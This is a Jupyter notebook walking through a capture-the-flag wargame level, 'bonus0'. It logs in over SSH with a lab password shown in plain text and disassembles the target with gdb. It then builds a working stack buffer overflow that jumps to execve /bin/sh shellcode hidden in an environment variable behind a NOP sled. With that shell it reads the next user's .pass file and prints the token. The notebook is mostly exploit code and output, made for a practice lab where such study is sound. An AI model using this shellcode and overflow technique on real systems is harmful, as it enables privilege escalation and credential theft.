In [1]:
import os
import sys

In [2]:
bool('Ressources' in os.getcwd()) if sys.path.append("../") else sys.path.append("../..")
from utils.ssh import exec, connect, get_func_address, get_func_structure
from utils.text import print_output, print_title
from utils.base import save_token, address_to_string

In [3]:
prefix = '../..' if bool('Ressources' in os.getcwd()) else '..'
password = open(f'{prefix}/level9/flag').read()
client = connect('bonus0', password)

Connect to bonus0
Execute command: sshpass -p f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728 ssh bonus0@0.0.0.0 -p 4242 -oStrictHostKeyChecking=no


In [4]:
files_list = exec(client, 'ls', title='Get files list')
print_output(files_list, 'Files')
print_title('Test this file')

Get files list
Execute command: ls
Files: bonus0
Test this file


In [5]:
binary_name = files_list[0]

In [6]:
exec(client, f'echo "" | ./{binary_name}', title='Simple execute binary')
print_title('Segfault')

Simple execute binary
Execute command: echo "" | ./bonus0
Segfault


In [7]:
output = exec(
    client, "(python -c \"print 'test'\"; python -c \"print 'test'\") | ./" + binary_name,
    title='Execute and input two lines')
print_output(output)
print_title('Expected two input values and program just print both of it inline')

Execute and input two lines
Execute command: (python -c "print 'test'"; python -c "print 'test'") | ./bonus0
-
-
test test
Expected two input values and program just print both of it inline


In [8]:
entry_points = ['main', 'p', 'pp']
func_info = exec(
    client, f'echo "info func" | gdb ./{binary_name} -q | egrep " {"| ".join(entry_points)}"',
    title='Get all functions')
print_output(func_info)
print_title(f'Three entry points {", ".join([f"{e} - {get_func_address(client, e)}" for e in entry_points])}')

Get all functions
Execute command: echo "info func" | gdb ./bonus0 -q | egrep " main| p| pp"
0x080483b0  puts
0x080483b0  puts@plt
0x080484b4  p
0x0804851e  pp
0x080485a4  main
Get #main address
Execute command: echo "info func" | gdb ./bonus0 -q | egrep " main$" | awk '{print $1}'
Get #p address
Execute command: echo "info func" | gdb ./bonus0 -q | egrep " p$" | awk '{print $1}'
Get #pp address
Execute command: echo "info func" | gdb ./bonus0 -q | egrep " pp$" | awk '{print $1}'
Three entry points main - 0x080485a4, p - 0x080484b4, pp - 0x0804851e


In [9]:
get_func_structure(client, 'main', title='Call function pp (+16)')
get_func_structure(client, 'pp', title='Call function p (+22)')
get_func_structure(client, 'p', title='Call function p (+22)')

Get #main structure
Execute command: echo "disass main" | gdb ./bonus0 -q
Reading symbols from /home/user/bonus0/bonus0...(no debugging symbols found)...done.
(gdb) Dump of assembler code for function main:
0x080485a4 <+0>:	push   %ebp
0x080485a5 <+1>:	mov    %esp,%ebp
0x080485a7 <+3>:	and    $0xfffffff0,%esp
0x080485aa <+6>:	sub    $0x40,%esp
0x080485ad <+9>:	lea    0x16(%esp),%eax
0x080485b1 <+13>:	mov    %eax,(%esp)
0x080485b4 <+16>:	call   0x804851e <pp>
0x080485b9 <+21>:	lea    0x16(%esp),%eax
0x080485bd <+25>:	mov    %eax,(%esp)
0x080485c0 <+28>:	call   0x80483b0 <puts@plt>
0x080485c5 <+33>:	mov    $0x0,%eax
0x080485ca <+38>:	leave
0x080485cb <+39>:	ret
End of assembler dump.
(gdb) quit
Call function pp (+16)
Get #pp structure
Execute command: echo "disass pp" | gdb ./bonus0 -q
Reading symbols from /home/user/bonus0/bonus0...(no debugging symbols found)...done.
(gdb) Dump of assembler code for function pp:
0x0804851e <+0>:	push   %ebp
0x0804851f <+1>:	mov    %esp,%ebp
0x08048521 

['Reading symbols from /home/user/bonus0/bonus0...(no debugging symbols found)...done.',
 '(gdb) Dump of assembler code for function p:',
 '0x080484b4 <+0>:\tpush   %ebp',
 '0x080484b5 <+1>:\tmov    %esp,%ebp',
 '0x080484b7 <+3>:\tsub    $0x1018,%esp',
 '0x080484bd <+9>:\tmov    0xc(%ebp),%eax',
 '0x080484c0 <+12>:\tmov    %eax,(%esp)',
 '0x080484c3 <+15>:\tcall   0x80483b0 <puts@plt>',
 '0x080484c8 <+20>:\tmovl   $0x1000,0x8(%esp)',
 '0x080484d0 <+28>:\tlea    -0x1008(%ebp),%eax',
 '0x080484d6 <+34>:\tmov    %eax,0x4(%esp)',
 '0x080484da <+38>:\tmovl   $0x0,(%esp)',
 '0x080484e1 <+45>:\tcall   0x8048380 <read@plt>',
 '0x080484e6 <+50>:\tmovl   $0xa,0x4(%esp)',
 '0x080484ee <+58>:\tlea    -0x1008(%ebp),%eax',
 '0x080484f4 <+64>:\tmov    %eax,(%esp)',
 '0x080484f7 <+67>:\tcall   0x80483d0 <strchr@plt>',
 '0x080484fc <+72>:\tmovb   $0x0,(%eax)',
 '0x080484ff <+75>:\tlea    -0x1008(%ebp),%eax',
 '0x08048505 <+81>:\tmovl   $0x14,0x8(%esp)',
 '0x0804850d <+89>:\tmov    %eax,0x4(%esp)',
 '0x

In [10]:
offset = 9
shellcode = '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e' \
            '\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'

In [11]:
env_name = 'exploit'
export_shellcode = f'export {env_name}=$(python -c \'print "\\x90" * 1000 + "{shellcode}"\')'
env_address = exec(client, f'{export_shellcode} && echo "b *main\nr\nx/200s environ\n" | '
                           f'gdb ./{binary_name} -q | '
                           f'grep "{env_name}" | '
                           f'awk \'{{print $1}}\' | sed \'s/://\'', title=f'Find shell code `{env_name}` address')[0]
print_output(env_address, f'Env #{env_name} address')
env_address = exec(client, f'{export_shellcode} && echo "b *main\nr\nx/200xg {env_address}\n" | '
                           f'gdb ./{binary_name} -q | '
                           f'head -n 15 | '
                           f'awk \'{{print $1}}\' | '
                           f'sed \'s/://\'', title='Search a little deeper...')[7]
print_output(env_address, f'Env #{env_name} address, finally')

Find shell code `exploit` address
Execute command: export exploit=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') && echo "b *main
r
x/200s environ
" | gdb ./bonus0 -q | grep "exploit" | awk '{print $1}' | sed 's/://'
Env #exploit address: 0xbffffb77
Search a little deeper...
Execute command: export exploit=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') && echo "b *main
r
x/200xg 0xbffffb77
" | gdb ./bonus0 -q | head -n 15 | awk '{print $1}' | sed 's/://'
Env #exploit address, finally: 0xbffffb97


In [12]:
f = lambda command: f"{export_shellcode} && echo \"{command}\" | " \
                    f"(python -c \"print '.' * 4095 + '\\n' + " \
                    f"'.' * {offset} + '{address_to_string(env_address)}' + '.' * 50\"; cat) | ./{binary_name}"

In [13]:
current_user = exec(client, f('whoami'), title='Check user')
print_output(current_user, 'Current user')

Check user
Execute command: export exploit=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') && echo "whoami" | (python -c "print '.' * 4095 + '\n' + '.' * 9 + '\x97\xfb\xff\xbf' + '.' * 50"; cat) | ./bonus0
Current user: bonus1


In [14]:
token = exec(client, f('cat /home/user/bonus1/.pass'), title='Steal password!')

Steal password!
Execute command: export exploit=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') && echo "cat /home/user/bonus1/.pass" | (python -c "print '.' * 4095 + '\n' + '.' * 9 + '\x97\xfb\xff\xbf' + '.' * 50"; cat) | ./bonus0


In [15]:
save_token(token, client)

Token to next level: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
